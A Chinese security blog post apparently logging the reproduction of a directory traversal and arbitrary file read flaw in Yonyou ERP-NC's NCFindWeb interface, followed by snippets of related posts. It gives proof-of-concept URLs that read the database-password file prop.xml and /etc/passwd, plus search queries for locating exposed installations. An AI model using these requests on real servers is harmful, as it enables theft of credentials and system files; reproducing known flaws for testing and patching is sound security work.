用友ERP-NC系统 NCFindWeb接口文件读取

已于 2022-03-15 09:32:17 修改
阅读量2.4k 收藏 1
点赞数
分类专栏: 渗透测试自学日志之漏洞复现篇 文章标签: 安全
于 2022-03-10 14:41:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/maverickpig/article/details/123400976
版权

用友ERP-NC系统 NCFindWeb接口文件读取

工作中遇到的漏洞,基于前人的复现教程成功复现,记录下自己的复现笔记,如有侵权,请联系我删除

漏洞详情

网上说可以遍历各种系统文件,但是实战中感觉对方实际上是做了控制的,存在漏洞但不一定真的能弄到敏感文件。
在这里插入图片描述

漏洞复现

POC

 http://vul/NCFindWeb?service=IPreAlertConfigService&filename=

在filename构造不同的路径可以访问到一些敏感文件
在这里插入图片描述
POC2

http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 可以读取到数据库密码

在这里插入图片描述

大多数时候是上图那样的,图中的文件都可以读取,但是其他文件夹不一定能穿越,不知道有没有大神能指点下。

用友ERP-NC 目录遍历
平凡
08-20 450
子夏曰:“贤贤易色,事父母能竭其力,事君能致其身,与朋友交,言而有信,虽曰未学,吾必谓之学矣。”
用友OA漏洞学习——NCFindWeb 目录遍历漏洞
记录并分享学习安全的知识点..
07-03 1564
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。
用友ERP-NC系统 漏洞 NCFindWeb接口任意文件下载
ShenZ的博客
07-28 2543
该漏洞权限比较大,可以获取数据库,/etc/passwd等信息,漏洞存在链接: http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 可以读取到数据库密码 WEB-INF/web.xml ../../../../../etc/passwd ...
用友NC UFIDA任意文件读取
最新发布
ljh123321ljh的博客
03-30 258
存在任意文件读取漏洞,未授权攻击者可以利用其读取f服务器、网站配置文件等敏感信息。1.fofa:app="用友-UFIDA-NC"在fofa中搜索存在漏洞的网址。3.访问网址,找网址关键信息。
用友NC任意文件读取
voctor2436的博客
05-24 1460
用友NC产品的全新系列、是面向集团企业的世界级高端管理软件,用友NC6的产品定位于大型企业管理与电子商务平台。用友NCFindWeb文件存在任意文件读取漏洞,攻击者通过漏洞可以获取网站源码,导致服务器失陷。用友NC采用J2EE架构和先进开放的集团级开发平台UAP,形成了集团管控8大领域15大行业68个细分行业的解决方案。一般性的建议:关注官方新版本的发布及补丁更新,建议使用对应WAF/IPS进行防护。
用友NC 漏洞
2301_80115097的博客
12-01 687
NCFindWeb?service=IPreAlertConfigService&filename=文件名。用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。if判断返回的数据出现index.html文件名则代表存在漏洞,否则不存在。在url处拼接poc后可以看到该站点的目录和文件。这里使用的是pocsuite3的poc模板。只需要修改_verify()部分即可。使用pocsuite3批量验证。
漏洞挖掘姿势之-用友NC目录遍历
Grace_for_it的博客
05-19 508
渗透测试 漏洞验证 用友NC
SRC-用友 ERP-NC NCFindWeb 目录遍历漏洞
hackzkaq的博客
11-06 1272
NCFindWeb?service=IPreAlertConfigService&filename=文件名。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。if判断返回的数据出现index.html文件名则代表存在漏洞,否则不存在。在url处拼接poc后可以看到该站点的目录和文件。这里使用的是pocsuite3的poc模板。只需要修改_verify()部分即可。
用友UFIDA-NC download 任意文件下载漏洞复现(含nuclei-poc)
m0_50797689的博客
03-21 519
用友UFIDA-NC download 任意文件下载漏洞复现(含nuclei-poc)
用友NC downCourseWare 任意文件读取漏洞复现
0xSec
06-06 783
用友NC 系统 /portal/pt/downCourseWare/download接口的filename参数存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,使系统处于极不安全状态。
用友NC目录遍历漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-18 2547
简介: 用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。 漏洞复现: fofa直接搜索: app="用友-UFIDA-NC" 漏洞拼接目录: /NCFindWeb?service=IPreAlertConfigService&filename /NCFindWeb?service=IPreAlertConfigService&filename= 读取:filename=读取文件名 ...
用友NC接口解决方案
01-30
接口方案说明,方便大家参考,类似的项目方案可以参考。
用友NC的一些漏洞复现
yzl_007的博客
12-15 1万+
用友NC的一些漏洞复现 一、BeanShell Test Servlet命令执行 漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 影响范围:NC 6.5版本 复现过程: 访问对应网站后界面如下: 漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet 后续还可以写shell进去,但是这里不
44、用友NC的REST接口笔记
wxingcai的博客
07-19 977
nc
用友NC开发常用的接口、父类和方法总结(长期更新)
旋转菌的博客
10-04 1万+
一转眼从.NET转JAVA已经大半个月了,刚进公司又被推到了项目一线现场,对基础并不怎么扎实的我来说也是有点惶恐,所幸有热心的小姐姐们愿意带我这个小白,在此记录一些二开常用的接口和方法以便以后查用。 - 常用接口 1. 任务插件执行接口 多用于执行后台循环任务,该接口实现后需要在前台进行插件注册。 public interface IBackgroundWorkPlugin { /** * ...
用友 NC客户化开发手册
热门推荐
只是因为在人群中多看了你一眼.......
08-03 2万+
NC客户化开发手册 本手册是北京齐力创辉科技发展有限公司(TTS)内部培训资料,只限于公司内部应用,任何人未经过书面许可不得扩大本教程的使用范围。严禁任何非法传播、翻印或仿制,违者必究! ©本手册的著作权属于北京齐力创辉科技发展有限公司 前言 目录 前言 1 第一章 规范篇 2 1.1 代码规范 2 1.2 注释规范 2 1.3 异常规范 2 1.4 其他规范
用友NC系列之Webservice开发入门
Nicky's blog
02-22 1万+
打开用友UAP,创建一个UAP工程 然后在public目录下面,写一个WebService接口package nc.webservice.service;import javax.jws.WebMethod; import javax.jws.WebParam; import javax.jws.WebResult; import javax.jws.WebService;@WebService
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
用友NC65 Rest接口开发及调试(二)
Wind的专栏
01-01 8290
NC中可以通过/uapws/service查看SOAP协议的接口的部署情况,REST协议的实际也有一个查看REST接口的serverlet,地址为uapws/restmanage,如下图,通过这个地址可以查看已经部署的REST接口清单以及接口所属的模块 标准产品中的供应链模块提供预置的REST接口服务,下面介绍通过Postman测试现存量查询的Rest接口。 1、获取user_token ...
用友ERP-NC存货核算详细操作与功能详解
用友ERP-NC存货核算使用手册(中文清晰版)》是一份详尽的指南,针对用友ERP-NC系统中的存货核算模块进行深入解析。该手册主要分为五个章节,帮助用户理解和掌握如何高效地运用该系统进行库存管理和成本控制。 第...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值